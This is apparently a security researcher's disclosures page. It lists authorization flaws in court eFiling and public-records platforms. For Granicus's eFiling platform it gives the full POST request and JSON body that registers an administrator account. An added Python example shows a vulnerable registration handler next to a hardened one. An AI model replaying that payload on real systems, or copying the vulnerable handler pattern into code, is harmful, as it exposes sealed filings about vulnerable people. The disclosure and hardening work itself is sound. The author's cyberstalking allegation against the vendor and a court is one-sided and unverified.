
qwell/disclosures


Disclosures

Timeline

2024-04-??

An insufficient permission check vulnerability in VendorC's court eFiling platform allows an attacker to view eFiling submissions (and their associated documents, regardless of confidentiality) filed by other users.

2024-04-??

Multiple vulnerabilities in VendorB's court eFiling platform allow an attacker to obtain the name, email, and phone number associated with every account; modify details of user accounts, including password and other sensitive information; deny access to user accounts; and gain administrator privileges.

2024-05-04

An insufficient permission check vulnerability in Catalis's EZ-Filing v4 eFiling platform allowed authenticated attackers to extract personal data, such as names, addresses, emails, and phone numbers, from user accounts by manipulating POST requests. This security flaw exposes users to potential identity theft and fraud.

EZ-Filing v4 is used by Georgia and South Carolina.

2024-05-04

An insufficient permission check vulnerability in Catalis's EZ-Filing v3 eFiling platform allowed authenticated users to access sealed documents, such as mental health reports in guardianship cases, exposing highly sensitive and confidential information. This security flaw compromises the privacy and safety of vulnerable individuals involved in legal proceedings.

EZ-Filing v3 is used by Maine.

2024-03-06

Insufficient permission check vulnerabilities in Granicus's GovQA allowed unauthorized access to view, edit, and change ownership of open records requests, including restricted-access confidential records. By changing ownership of a request, an attacker could effectively deny a legitimate user's access to that request. The vulnerabilities affected various deployments, including numerous Departments of Children and Family Services or their equivalents, which handle highly sensitive records of domestic violence and sexual abuse allegations against children.

2024-03-02

Vulnerabilities in Granicus's eFiling platform allowed attackers to register accounts in any organization of their choosing, including the organization that granted administrator privileges. Administrators have carte blanche access to all filings in all cases. Additionally, an organization owner could force any user into their own organization, which allowed the organization owner to effectively revoke privileges of administrators or other organization owners.

Granicus's eFiling platform is used statewide in Florida and Arizona.

Administrator accounts could be registered by sending a POST to /api/Security/RegisterUser with the following JSON.

{
  "User":{
    "OrganizationId":"0","IsAdministrator":true,"UserTypeCode":"10",
    "IdType":-1,"IdTypeSpecified":false,"IdState":"-1","IdNumber":"",
    "LogonName":"<username>","LogonPassword":"<password>",
    "FirstName":"Example","MiddleName":"","LastName":"User","Suffix":"",
    "PrimaryEmailAddress":"fake@example.com","AlternateEmailAddress1":"","AlternateEmailAddress2":"",
    "Address1":"123 Fake St","Address2":"","City":"Beverly Hills","State":"CA","ZipCode":"90210",
    "Country":"US","CountryCode":"US","PhoneNumber":"","PhoneExtension":""
  },"ForceToPendingApproval":false,"ForceCreateUser":false
}
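Added example, not code from this repository or from Granicus: a minimal registration handler in Python, first as one that stores the user object exactly as the client sent it (the behaviour the payload above exploits), then hardened so organization membership and administrator status come only from server-side state. The Invitation record and the sample values are assumptions made for the illustration.

```python
import json
from dataclasses import dataclass

# Privilege-bearing fields: only the server may decide these.
SERVER_CONTROLLED = ("OrganizationId", "IsAdministrator", "UserTypeCode")
# Profile fields a client is allowed to supply at registration.
PROFILE_FIELDS = ("LogonName", "FirstName", "LastName", "PrimaryEmailAddress")

# Constructed request in the shape of the disclosed payload (trimmed).
SAMPLE_REQUEST = json.dumps({
    "User": {"OrganizationId": "0", "IsAdministrator": True, "UserTypeCode": "10",
             "LogonName": "newuser", "LogonPassword": "hunter2",
             "FirstName": "Example", "LastName": "User",
             "PrimaryEmailAddress": "fake@example.com"},
    "ForceToPendingApproval": False, "ForceCreateUser": False,
})


def register_vulnerable(body: str) -> dict:
    """Mirrors the reported flaw: every field in "User" is trusted, so the
    client chooses its own organization and whether it is an administrator."""
    user = json.loads(body)["User"]
    return {k: user[k] for k in PROFILE_FIELDS + SERVER_CONTROLLED}


@dataclass
class Invitation:
    """Hypothetical server-side record created when an organization owner
    invites an address; it, not the request body, fixes the organization."""
    email: str
    organization_id: str


def register_hardened(body: str, invite: Invitation) -> tuple[dict, list]:
    """Allowlist the profile fields, take OrganizationId from the invitation,
    never grant admin at registration, and report which client-supplied
    privilege fields were ignored so the attempt can be logged and alerted on."""
    user = json.loads(body)["User"]
    if user.get("PrimaryEmailAddress", "").lower() != invite.email.lower():
        raise PermissionError("registration email does not match invitation")
    ignored = [k for k in SERVER_CONTROLLED if k in user]
    record = {k: user[k] for k in PROFILE_FIELDS if k in user}
    record["OrganizationId"] = invite.organization_id
    record["IsAdministrator"] = False          # granted later by a separate, audited flow
    record["ForceToPendingApproval"] = True    # approval is the server's decision too
    return record, ignored
```

In the hardened path a request carrying `IsAdministrator` or `OrganizationId` still succeeds as an ordinary registration, but the non-empty `ignored` list is the signal worth logging.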

Note: Shortly after receiving my report, Granicus evidently leaked my information to the Arizona Supreme Court. For the next two months, Granicus and the Arizona Supreme Court cyberstalked me; my LinkedIn profile was viewed repeatedly, sometimes multiple times per day, by several employees from each company.

2023-11-30

Insufficient permission check vulnerabilities in public court record platforms from multiple vendors allowed unauthorized public access to sealed, confidential, unredacted, and/or otherwise restricted case documents. Affected documents include witness lists and testimony, mental health evaluations, child custody agreements, detailed allegations of abuse, corporate trade secrets, jury forms, and much more.

2023-11-06

  • Leaked personal data of inmates and officers.

2023-09-13

  • Arbitrary text descriptions and thumbnails in link cards.
  • Disguised links in post text.

Contact

Jason Parker

Sponsorship

About

List of vulnerability disclosures
